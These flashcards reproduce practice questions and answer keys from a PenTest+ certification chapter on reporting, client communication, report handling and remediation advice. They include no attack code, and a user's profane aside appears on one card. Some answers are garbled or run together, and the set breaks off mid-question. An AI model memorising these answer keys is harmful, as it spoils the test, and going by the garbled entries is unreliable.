Flashcards in “CompTIA PenTest+ Practice Test Chapter 5 Reporting and Communication (Sybex: Panek, Crystal, Tracy)”
1
Q
You have just completed a penetration test for a client. During the test, you used a variety of different tools to collect data and conduct exploits. Now you need to aggregate all of the data generated by these tools into a format that is consistent, correlated, and readable. What is this process called?
A.Attestation of findings
B.Normalization of data
C.De-escalation
D.De-confliction
A
B.Normalization of data
Explanation:
When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and correlated. The goal is to make it such that the client can read the aggregated data and understand what happened during the test and when.
2
Q
You have just completed a penetration test for a client and are now creating a written report of your findings. You need to make sure the reader understands that you followed the PCI DSS standard while conducting the test. In which part of the report should you include this information?
A.Findings
B.Remediation
C.Metrics and Measures
D.Methodology
A
D.Methodology
Explanation:
The final report you write for a penetration test should include a section entitled Methodology. In this section, you describe the penetration testing methodology you used to conduct the test. In this scenario, this would be the appropriate place to indicate that the PCI DSS standard was followed to conduct the test.
3
Q
One of the goals of communication between the tester and the client during a penetration test is to ensure that both parties clearly understand the current security state of the network. Which of the following terms best describes this shared understanding?
A.Situational awareness
B.De-escalation
C.De-confliction
D.Goal reprioritization
A
A.Situational awareness
Explanation;
Among other things, the term situational awareness refers to a state of shared understanding between the client and the tester regarding the security posture of the client’s network.
4
Q
During a penetration test, the client organization’s network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company’s web server. The administrator calls the penetration tester to verify that the attack is part of the penetration test and not coming from a real attacker. What is this process called?
A.Normalization of data
B.Situational awareness
C.De-confliction
D.Goal reprioritization
A
C.De-confliction
Explanation:
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.
5
Q
During a penetration test, the client organization begins to receive complaints from customers indicating that the organization’s web server is very slow to respond or even crashes at times. The network administrator discovers a distributed denial of service (DDoS) attack underway that is aimed at the company’s web server. Sales are being lost, so the administrator calls the penetration tester and asks them to stop the attack. What is this communication path called?
A.Situational awareness
B.De-escalation
C.De-confliction
D.Goal reprioritization
A
B.De-escalation
Explanation:
The term de-escalation refers to the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network.
6
Q
Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to ensure everyone knows what the others are doing. What is this process called?
A.Situational awareness
B.Metrics and measures
C.De-confliction
D.Normalization of data
A
A.Situational awareness
Explanation:
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that every team member is aware of what the others are doing.
7
Q
Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to coordinate the timing of activities, including reconnaissance, enumeration, exploits, and so on. What is this process called?
A.Situational awareness
B.De-escalation
C.De-confliction
D.Normalization of data
A
A.Situational awareness
Explanation:
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are coordinated to occur at the appropriate time.
8
Q
During a penetration test, the client organization begins to receive complaints from remote workers indicating that the organization’s VPN is down. The network administrator discovers a local area network denial (LAND) attack underway that is aimed at the company’s VPN server at the edge of the network. The remote workers are unable to work, so the administrator calls the penetration tester and asks them to dial back the attack.
What is this communication path called?
A.Situational awareness
B.De-escalation
C.De-confliction
D.Goal reprioritization
A
B.De-escalation
Explanation:
The term de-escalation refers to the process of communicating between the client and the tester to dial back the intensity of exploits used during the penetration test because of the adverse effects they may be having on the network.
9
Q
During a penetration test, the client organization’s network administrator discovers a teardrop attack underway that is aimed at the company’s perimeter router. The administrator calls the penetration tester to see whether the attack is part of the penetration test. What is this communication path called?
A.Situational awareness
B.Metrics and measures
C.De-confliction
D.Normalization of data
A
C.De-confliction
Explanation:
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.
10
Q
Your organization is conducting a black box penetration test for a client. There are three testers on your team. At the beginning of the process, you have a team meeting to plan how the test will be conducted, when certain activities will occur, and which team members will be responsible for performing specific tasks. What is this process called?
A.De-confliction
B.De-escalation
C.Situational awareness
D.Goal reprioritization
A
C.Situational awareness
Explanation:
Among other things, the term situational awareness refers to a state of common understanding between all members of the penetration testing team to ensure that testing activities are planned and coordinated to occur at the appropriate time.
11
Q
During a penetration test, an individual is caught trying to piggyback into the client organization’s facility. The trespasser claims to be a penetration tester and insists on being released.
Prior to pressing criminal charges, a member of the client’s IT staff calls the penetration tester to determine whether the trespasser is really a member of the penetration testing team. What is this communication path called?
A.Goal reprioritization
B.De-confliction
C.Situational awareness
D.De-escalation
A
B.De-confliction
Explanation:
The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is actually part of the authorized penetration test or whether it has been instigated by a third-party hacker.
12
Q
During a penetration test, a tester gains physical access to the client’s facility using pretexting and is able to trigger a fail-open event for all of the organization’s electronic locking systems. As a result, all of the doors in the facility are unlocked. The client’s internal security team calls the penetration tester and asks them to stop the attack and immediately re-enable the door locks. What is this process called?
A.Situational awareness
B.Goal reprioritization
C.De-confliction
D.De-escalation
A
D.De-escalation
Explanation:
The term de-escalation refers to the process of communicating between the client and the tester to dial back the intensity of exploits or even stop them all together because of unsafe situations they may be causing.
13
Q
Which of the following best describe a trusted agent during a penetration test?
A.A tester who secretly penetrates the target organization by applying for a job there
B.An individual within the target organization who has a direct line of communication with the penetration tester
C.An individual on the penetration testing team who has a direct line of communication with the IT staff of the target organization
D.A representative of the local law enforcement agency who has been briefed about the test by the penetration tester
A
B.An individual within the target organization who has a direct line of communication with the penetration tester
Explanation:
The term trusted agent refers to an individual within the target organization, typically an IT administrator or a manager, who has a direct line of communication with the penetration tester. This individual is usually responsible for de-confliction and de-escalation communications between the client and the tester.
14
Q
You are conducting a black box penetration test for a client. The reconnaissance phase of the test is complete, and you are ready to move on to the next phase. Before doing so, you communicate with the client and inform them that test is moving from one
phase to another. Which type of communication trigger was used in this scenario?
A.Stages
B.Critical findings
C.Communication path
D.Indicators of prior compromise
A
A.Stages
Explanation:
A stages communication trigger happens when the penetration test progresses from one phase to another.
15
Q
You are conducting a gray box penetration test for a client. During the test, you discover that many users’ Windows desktop systems haven’t been patched properly and are still vulnerable to several common types of ransomware. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their systems are vulnerable. Which type of communication trigger was used in this scenario?
A.Risk rating
B.Critical findings
C.Findings and remediation
D.Indicators of prior compromise
A
B.Critical findings
Explanation:
A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.
16
Q
You are conducting a white box penetration test for a client. During the test, you discover a hidden backdoor administrator account on one of the client’s Active Directory domain controllers. You check the logs of the domain controller and find that the backdoor account is being actively used on a daily basis. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that their server has been compromised. Which type of communication trigger was used in this scenario?
A.Stages
B.Critical findings
C.Communication path
D.Indicators of prior compromise
A
D.Indicators of prior compromise
Explanation:
An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.
17
Q
You are conducting a black box penetration test for a client. The enumeration phase of the test is complete, and you are ready to begin exploiting vulnerable systems. Before doing so, you communicate with the client and inform them that test is transitioning. Which type of communication trigger was used in this scenario?
A.Risk rating
B.Critical findings
C.Findings and remediation
D.Stages
A
D.Stages
Explanation;
A stages communication trigger happens when the penetration test progresses from one phase to another.
18
Q
You are conducting a white box penetration test for a client. During the test, you notice outgoing network traffic consistent with a distributed denial of service (DDoS) attack. You suspect that internal systems have been infected with malware, creating an amplifier network for the attack. Instead of waiting until the end of the test, you immediately communicate with the client to warn them. Which type of communication trigger was used in this scenario?
A.Stages
B.Indicators of prior compromise
C.Findings and remediation
D.Critical findings
A
B.Indicators of prior compromise
Explanation:
An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.
19
Q
You are conducting a gray box penetration test for a client. During the test, you discover that help desk technicians are using authenticated but unencrypted FTP connections over the Internet to transfer files to computers located at remote branch-office sites. As such, their credentials are potentially being exposed on the public network. Even though this represents a tempting target for you to exploit, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that privileged credentials are potentially being exposed on the Internet. Which type of communication trigger was used in this scenario?
A.Stages
B.Critical findings
C.Communication path
D.Indicators of prior compromise
A
B.Critical findings
Explanation:
A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.
20
Q
You are conducting a black box penetration test for a client. The test is now complete, and you are ready to begin cleaning up after yourself. Before doing so, you communicate with the client and inform them that the test is complete and to be aware that cleanup activates will be occurring. Which type of communication trigger was used in this scenario?
A.Risk rating
B.Critical findings
C.Stages
D.Indicators of prior compromise
A
C.Stages
Explanation:
A stages communication trigger happens when the penetration test progresses from one phase to another.
21
Q
You are conducting a black box penetration test for a small financial institution. Using pretexting, you are able to gain access to the target facility by posing as a copier repair person. As you walk through the building, you notice that almost all employees have written their (overly complex) passwords on sticky notes and posted them on their computer monitors and keyboards. Some are so obvious that they can be seen by keen-eyed customers. This represents a tempting target for you to exploit; however, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that credentials are plainly visible. Which type of communication trigger was used in this scenario?
A.Indicators of prior compromise
B.Critical findings
C.Communication path
D.Stages
A
B.Critical findings
Explanation:
A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.
22
Q
You are conducting a white box penetration test for a client. During the test, you notice that all end-user workstations are configured with only the default Windows antivirus scanner. You further notice that many end users use an application to complete their daily work that is a known Trojan horse commonly used to create a botnet. Instead of waiting until the end of the test, you immediately communicate with the client to warn them.
Which type of communication trigger was used in this scenario?
A. Indicators of prior compromise
B.Critical findings
C.Communication path
D.Stages
A
A. Indicators of prior compromise
Explanation:
An indicator of prior compromise communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.
23
Q
You are conducting a PCI DSS penetration test for a client. During the testing process, a dangerous ransomware exploit begins to spread between networks around the world. The client asks you to halt the PCI DSS penetration test and instead test to see whether their network is vulnerable to this new type of malware. Which term best describes what happened in this scenario?
A.Situational awareness
B.Goal reprioritization
C.Indicators of prior compromise
D.Attestation of findings
A
B.Goal reprioritization
Explanation:
Goal reprioritization occurs when either the client or the tester decides to change the focus of the penetration test from the agreed upon scope after the test has already started. In this scenario, the PCI DSS test is being modified to include testing for vulnerability for the new type of ransomware.
24
Q
You are conducting a gray box penetration test for a client. During the testing process, you notice that their wireless network uses weak encryption with a preshared key (00000001) that is easy to brute-force crack. Further, you notice that client has implemented omnidirectional access points throughout the facility. You suspect that the wireless signal is emanating far outside the building. You contact the client and recommend that the test be modified to include testing of the Wi-Fi network from a black box perspective. Which term best describes what happened in this scenario?
A.Goal reprioritization
B.Attestation of findings
C.Indicators of prior compromise
D.Situational awareness
A
A.Goal reprioritization
Explanation:
Goal reprioritization occurs when either the client or the tester decides to change the focus of the penetration test from the agreed upon scope after the test has already started. In this scenario, a black box component has been added to a traditional gray box test.
25
Which of the following terms refers to the process of gathering data produced by the various tools in a penetration test and formatting the data in a consistent manner such that it can be easily read?
A.Attestation of findings
B.Normalization of data
C.Remediation
D.Disposition of reports
B.Normalization of data
Explanation:
When you normalize the data from a penetration test, you aggregate all the data generated by all of the different tools and processes you used during the test and format it such that it is consistent and easy to understand.
26
You are generating a written report of findings after a penetration test. During the test, you followed the NIST 800-115 standard. In which section of the report should you include this information?
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
B.Methodology
Explanation:
When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the NIST 800-115 methodology.
27
You are generating a written report of findings after a penetration test. In which section of the report should you provide the reader with a high-level synopsis of the test and the results?
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
A.Executive summary
Explanation:
When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.
28
You are generating a written report of findings after a penetration test. In which section should you report risk ratings?
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures Conclusion
D.Metrics and measures Conclusion
Explanation:
When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.
29
Which section of a written report of penetration test findings is intended to be read by less-technical audiences?
```
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion
```
A.Executive summary
Explanation:
When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results in the Executive Summary. Typically, this is the first section of the report and is intended for less-technical audiences.
30
***THIS IS A DUMB FUCKING QUESTION***
You are generating a written report of findings after a penetration test. During the test, you followed the specifications of the EC-Council for its Certified Ethical Hacker (CEH) certification. Where should this information be included in your report?
```
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion
```
B.Methodology
Explanation:
When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the Methodology section. In this example, you would inform the reader that you used the EC-Council’s CEH methodology.
31
You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven’t been patched properly and are susceptible to the WannaCry ransomware. Where should you include this information in your report?
```
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion
```
C.Findings and remediation
Explanation:
When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them.
32
You are generating a written report of findings after a penetration test. During the test, you discovered that many older Windows workstations in the network haven’t been patched properly and are susceptible to the WannaCry ransomware. To fix this, the client needs to install the MS17-010 – Critical update from Microsoft. Where should you include this recommendation in your report?
```
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion
```
C.Findings and remediation
Explanation:
When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them and what the client can do to fix the problem. In this example, you should recommend they install the MS17-010 – Critical update from Microsoft in this section.
33
You are generating a written report of findings after a penetration test. You cross-reference each vulnerability you found in the test against the Common Vulnerabilities and Exposures (CVE) database to assign it a qualitative risk rating of Low, Medium, High, or Critical. Where should these risk ratings be included in the report?
```
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion
```
D.Metrics and measures
Explanation:
When creating your written report of findings after completing a penetration test, you should report your risk ratings in the Metrics and Measures section. These ratings allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.
34
You are generating a written report of findings after a penetration test. Based on the results of the test, you have created a list of recommendations you feel the client should focus on. Where should you include your recommendations in the report?
```
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion
```
E.Conclusion
Explanation:
When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section.
35
You are generating a written report of findings after a penetration test. In which section of the report should you consider the risk appetite of the client when deciding which information to include?
```
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion
```
C.Findings and remediation
Explanation:
The information you include in the Findings and Remediation section of your written report of findings will usually be constrained by the client’s risk appetite. For example, an organization with a higher-risk appetite may want you to only include information about high-risk or critical-risk vulnerabilities you discovered and not report medium or low-risk vulnerabilities.
36
You are generating a written report of findings after a penetration test. Based on the sheer number of vulnerabilities you discovered in the test, you feel that the client should undergo a follow-up penetration test within the next three months to verify that the issues have been remediated. Where should you include this recommendation in the report?
```
A.Executive summary
B.Methodology
C.Findings and remediation
D.Metrics and measures
E.Conclusion
```
E.Conclusion
Explanation:
When creating your written report of findings after completing a penetration test, you should report your recommendations in the Conclusion section, including when you think the client should conduct follow-up penetration tests.
37
You have just finished writing a report of findings for a client after a penetration test. How long is your organization required to store the document after the test is complete?
A.Six months
B.One year
C.Five years
D.Depends on the client contract
D.Depends on the client contract
Explanation:
Typically, there is no legally mandated storage time for reports after a penetration test is complete. The amount of time you are required to store the client’s report will usually be governed by your contract with the client.
38
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?
A.Print a hard copy and keep it in a file folder on your desk.
B.Save it to a flash drive that is stored in a pen holder on your desk.
C.Burn it to a rewritable optical disc and store it in desk drawer.
D.Save it to an encrypted file on a file server.
D.Save it to an encrypted file on a file server.
Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing the report in an encrypted file on a file server would make it more difficult for the file to be stolen than the other options listed.
39
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?
A.Print a hard copy and store it in a locked filing cabinet that has been bolted to the floor.
B.Save it to your Google drive account.
C.Save it in a file on your laptop.
D.Burn it to a rewritable optical disc and store it in a CD caddy on your desk.
A.Print a hard copy and store it in a locked filing cabinet that has been bolted to the floor.
Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, storing a hard copy of the report in a locked filing cabinet that has been bolted to the floor would make it more difficult for the report to be stolen than the other options listed.
40
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?
A.Burn the report to an optical disk and store it in a locked safe bolted to your desk.
B.Save the file to an encrypted flash drive.
C.Copy the file to your phone.
D.Save the report to a file on your workstation’s desktop.
A.Burn the report to an optical disk and store it in a locked safe bolted to your desk.
Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, burning the file to an optical disc and storing it in a secured safe would make it more difficult for the report to be stolen than the other options listed.
41
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client’s written report of findings?
A.Burn the report to an optical disk and keep it in a hanging file folder in your desk.
B.Save the file to an encrypted flash drive and store it in a locket cabinet.
C.Copy the file to your phone.
D.Save the report to your organization’s FTP server.
B.Save the file to an encrypted flash drive and store it in a locket cabinet.
Explanation:
The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, saving the file to an encrypted flash drive and storing it in a secured cabinet would make it more difficult for the report to be stolen than the other options listed.
42
You need to dispose of several penetration test reports from old clients. The files are stored on a removable hard drive that is stored in a locked safe. Which of the following is the best way to do this?
A.Delete the files from the drive.
B.Use the fdisk utility to repartition the drive.
C.Use disk wiping software on the drive.
D.Reformat the drive.
C.Use disk wiping software on the drive.
Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, wiping the drive will make it much harder to recover the files from the drive.
43
You need to dispose of several penetration test reports from old clients. Hard copies of the reports are stored in a locked filing cabinet that has been bolted to the floor. Which of the following is the best way to do this?
A.Put the reports in the garbage.
B.Put the reports in the recycle bin.
C.Stack the reports upside down by your team’s printer for use as “scratch paper.”
D.Shred the report in a cross-cut shredder.
D.Shred the report in a cross-cut shredder.
Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, shredding the
documents will make it much harder to recover the data from the reports.
44
You need to dispose of several penetration test reports from old clients. The files are stored on flash drives that are stored in a locked cabinet. Which of the following is the best way to do this?
A.Smash the drives with a hammer.
B.Delete the files from the drives.
C.Use the Disk Management utility to repartition the drives.
D.Reformat the drives using File Explorer in Windows.
A.Smash the drives with a hammer.
Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying inexpensive flash drives will make it much harder to recover the data from the reports.
45
You need to dispose of several penetration test reports from old clients. The files are stored on rewritable optical discs that are stored in a locked cabinet. Which of the following is the best way to do this?
A.Delete the files from the discs.
B.Shred the discs.
C.Delete the files and then save new files to the discs.
D.Reformat the discs.
B.Shred the discs.
Explanation:
The written report of findings contains highly sensitive information and should therefore be disposed of securely. It should not be disposed of in a manner that would allow it to be stolen or reconstructed. In this scenario, physically destroying optical discs will make it much harder to recover the data from the reports.
46
You have just concluded a penetration test for a client that makes extensive use of work-at-home employees. The employees use a VPN connection. During the test, you were able to use social engineering to compromise an employee’s VPN connection and gain access to the internal network. As a mitigation strategy, you recommend that the client implement multifactor authentication for all VPN connections. What type of solution is this?
A.Technological
B.People
C.Process
D.Tactical
A.Technological
Explanation:
Implementing multifactor authentication for VPN connections is an example of a technological mitigation strategy.
47
You have just concluded a penetration test for a client. During the test, you were able to use social engineering techniques to gain access to the server room inside the client’s facility. To address this vulnerability, you recommend that the client require security awareness training for all employees every six months. What type of solution is this?
A.Technological
B.People
C.Process
D.Tactical
B.People
Explanation:
Implementing regular security awareness training for all employees is an example of a people-based mitigation strategy.
48
You have just concluded a penetration test for a client. During the test, you were able to use stale user accounts associated with former employees to gain access to a sensitive file server. To address this vulnerability, you recommend that the client remove
user accounts whenever an employee leaves the organization. What type of solution is this?
A.Technological
B.People
C.Process
D.Strategic
C.Process
Explanation:
Implementing off-boarding processes for employees when they leave the organization is an example of a process-based mitigation strategy.
49
You have just concluded a penetration test for a client. During the test, you discovered that system administrators were using unencrypted Telnet sessions to remotely manage sensitive servers. You were able to sniff network traffic and capture administrative credentials from these connections. To address this vulnerability, you recommend that the client require all IT staff to pass a network security certification exam. What type of solution is this?
A.Technological
B.People
C.Process
D.Strategic
B.People
Explanation:
Requiring IT staff members to pass a network security certification exam is an example of a people-based mitigation strategy.
50
You have just concluded a penetration test for a client. During the test, you were able to use John the Ripper to brute force an administrative password on a sensitive Windows file server. To address this vulnerability, you recommend that the client implement Group Policy settings that require complex passwords as well as lock the system after three incorrect logon attempts. What type of solution is this?
A.Technological
B.People
C.Process
D.Scalable
A.Technological
Explanation:
Requiring complex passwords and implementing account restrictions are examples of technological mitigation strategies.
51
You have just concluded a penetration test for a client. The client has more than 2,000 employees, but only two of them are network administrators. During the test, you were able to quickly overwhelm them with the sheer volume of your attacks. To address this vulnerability, you recommend that the client hire additional network administrators who have cybersecurity credentials and experience. What type of solution is this?
A.Technological
B.People
C.Process
D.Scalable
B.People
Explanation:
Hiring additional IT staff members who have experience with cyber security is an example of a people-based mitigation strategy.
52
You have just concluded a penetration test for a client. During the test, you discovered that the organization’s employees made extensive use of a shared Google Drive account to collaborate. You were able to use a social engineering exploit to get access to the shared account and access sensitive files. To address this vulnerability, you recommend that the client disallow this practice among employees. What type of solution is this?
A.Technological
B.People
C.Process
D.Scalable
C.Process
Explanation:
Forbidding employees from using external cloud-based services such as Google Drive is an example of a process-based mitigation strategy.
53
You have just concluded a penetration test for a client. During the test, you were able to gain access to the client’s physical facility by tailgating with a group of employees. To address this vulnerability, you recommend that the client implement a man-trap locking door at the entrance to the facility. What type of solution is this?
A.Technological
B.People
C.Process
D.Scalable
A.Technological
Explanation:
Implementing a mantrap at the main entrance is an example of a technological mitigation strategy.
54
You have just concluded a penetration test for a client. During the test, you were able to gain access to the client’s wireless network using Aircrack-ng while sitting in your car in a parking lot across the street. To address this vulnerability, you recommend that the client implement directional wireless network antennas and also manipulate the power level of the access points to prevent signal emanation. What type of solution is this?
A.Technological
B.People
C.Process
D.Scalable
A.Technological
Explanation:
Implementing directional wireless antennas and manipulating access point power levels to prevent signal emanation are examples of technological mitigation strategies.
55
You have just concluded a penetration test for a client. During the test, you were able to use social engineering to convince the organization’s accounts payable clerk to send a large ACH payment to a fictitious bank account. To address this vulnerability, you recommend that the client implement division of duties such that two individuals must sign off on all payouts. What type of solution is this?
A.Technological
B.People
C.Process
D.Scalable
C.Process
Explanation:
Requiring multiple sign-offs on payouts is an example of a process-based mitigation strategy.
56
You have just concluded a penetration test for a client. During the test, you were able to use a phishing exploit to collect authentication credentials from several employees. To address this vulnerability, you recommend that the client conduct a mandatory security awareness training session for all employees. What type of solution is this?
A.Technological
B.People
C.Process
D.Scalable
B.People
Explanation:
Conducting security awareness training with employees is an example of a people-based mitigation strategy.
57
You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. What could you recommend to remediate this problem?
A.Encrypt the passwords.
B.Implement password complexity requirements.
C.Implement intruder lockout.
D.Randomize the local Administrator credentials.
D.Randomize the local Administrator credentials.
Explanation:
Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to simply randomize those credentials. Otherwise, compromising the local administrator password on one desktop would expose all the other desktops in the organization.`
58
You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. When you report this to the client, they indicate that are aware of this and that they did this deliberately to reduce management complexity. What solution could you recommend that would remediate the vulnerability without increasing management complexity?
A.Randomize the local Administrator credentials. B.Implement LAPS.
C.Make all local Windows users members of the local Administrators group.
D.Make all Windows domain users members of the Domain Administrators group.
B.Implement LAPS.
Explanation:
Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to implement the Local Administrator Password Solution (LAPS) from Microsoft. This solution periodically randomizes local administrator passwords and saves those secrets in Active Directory.
59
You have just concluded a penetration test for a client. In your findings, you report that you were able to compromise several users’ Windows accounts because they used passwords such as password, aaa, and 1234. Which of the following domain Group Policy settings could you recommend they implement to prevent weak password complexity? (Choose two.)
A.Store passwords using reversible encryption.
B.Password must meet complexity requirements.
C.Minimum password length.
D.Certificate path validation settings.
E.Certificate services client – Auto-enrollment.
B.Password must meet complexity requirements. C.Minimum password length.
Explanation:
The “Password must meet complexity requirements” and the “Minimum password length” Group Policy settings can be used to enforce a degree of password complexity. By default, the “Password must meet complexity requirements” policy requires passwords be at least six characters long and contain characters from three of the following four categories: uppercase letters, lowercase letters, numbers, and special characters. The minimum password length defines the least number of characters that a password may contain.
60
Which of the following Windows Group Policy settings can be used to prevent a user from reusing the same password over and over?
A.Enforce password history
B.Store passwords using reversible encryption C.Minimum password length
D.Password must meet complexity requirements
A.Enforce password history
Explanation:
The “Enforce password history” Group Policy setting determines the number of unique new passwords that a user must use before an old password can be reused again. Configuring this policy helps enhance security by preventing users from reusing old passwords.
61
Which of the following Windows Group Policy settings determines how long a user can keep the same password before being required to change it to a new one?
A.Enforce password history
B.Minimum password length
C.Minimum password age
D.Maximum password age
D.Maximum password age
Explanation:
The “Maximum password age” Group Policy setting determines how long a user can keep the same password before being required to change it to a new one. Once that time period has elapsed, the user is forced to create a new password.
62
Which of the following Windows Group Policy settings determines how long a user must keep the same password before being allowed to change it to a new one?
A.Enforce password history
B.Minimum password length
C.Minimum password age
D.Maximum password age
C.Minimum password age
Explanation:
The “Minimum password age” Group Policy setting determines how long a user must keep the same password before being allowed to change it to a new one. Until that time period has elapsed, the user is forced to keep the same password. This prevents users from making constant changes to their password in an attempt to circumvent the “Enforce password history policy” setting.
63
You have just concluded a penetration test for a client. In your findings, you report that users are allowed to keep the same password indefinitely, which increases the likelihood that they will be compromised at some point. Given that the client users Linux desktops and servers, which of the following Linux commands should you recommend they use to fix this issue?
A.chage
B.chmod
C.chgroup
D.chown
A.chage
Explanation:
The chage command can be used on Linux systems to configure password aging for user accounts.
64
You have just concluded a penetration test for a client. In your findings, you report that brute-force password attacks against Windows domain user accounts were successful because nothing stopped the password-cracking software from trying password after password for a given user. Which of the following Windows domain Group Policy settings could you recommend the client implement to remediate this issue?
A.Enforce password history
B.Password must meet complexity requirements
C.Store passwords using reversible encryption D.Account lockout threshold
D.Account lockout threshold
Explanation:
The “Account lockout threshold” Group Policy setting determines the number of failed logon attempts a user is allowed to make before the account is locked. A locked account can’t be used again until it is unlocked by an administrator or the lockout period for the account has elapsed. This policy setting can help prevent brute-force attacks by locking an account after only a few guessing attempts.
65
Which Windows Group Policy setting determines how long a user’s account will stay locked if the wrong password has been entered too many times?
A.Maximum password age
B.Account lockout duration
C.Account lockout threshold
D.Minimum password age
B.Account lockout duration
Explanation:
The “Account lockout duration” Group Policy setting determines how long a locked account remains locked before being automatically unlocked. This policy setting helps prevent brute-force attacks by severely increasing the amount of time required to conduct the attack.
66
Which Windows Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0?
A.Account lockout duration
B.Account lockout threshold
C.Reset account lockout counter after
D.Store passwords using reversible encryption
C.Reset account lockout counter after
Explanation:
The “Reset account lockout counter after” Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0. This policy setting helps prevent brute-force attacks by significantly increasing the amount of time required to conduct the attack.
67
You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their works is complete. Given that the client user Linux desktops and servers, which of the following Linux commands should you recommend they use to automatically lock user accounts after a certain time?
A.chage
B.chmod
C.chgroup
D.chown
A.chage
Explanation:
The chage command can be used on Linux systems to automatically lock user accounts after a certain time. This prevents stale user accounts from being used by an attacker or disgruntled former employee to gain unauthorized access.
68
Which of the following Windows Group Policy settings should never be enabled?
A.Store passwords using reversible encryption B.Password must meet complexity requirements C.Minimum password length
D.Certificate path validation settings
A.Store passwords using reversible encryption
Explanation:
The “Store passwords using reversible encryption” policy is highly insecure. It is included in modern deployments to provide backward compatibility with older applications. A client who has this policy turned on should be advised of the security consequences and to consider upgrading to newer applications that don’t require it.
69
During a penetration test, you discover that your client uses a web application that was developed in-house that stores user passwords as clear text within a MySQL database. What should you recommend?
A.Purchase a commercial application that performs a similar task.
B.Rewrite the application to encrypt passwords before they are saved in the database.
C.Switch to the PostgreSQL database.
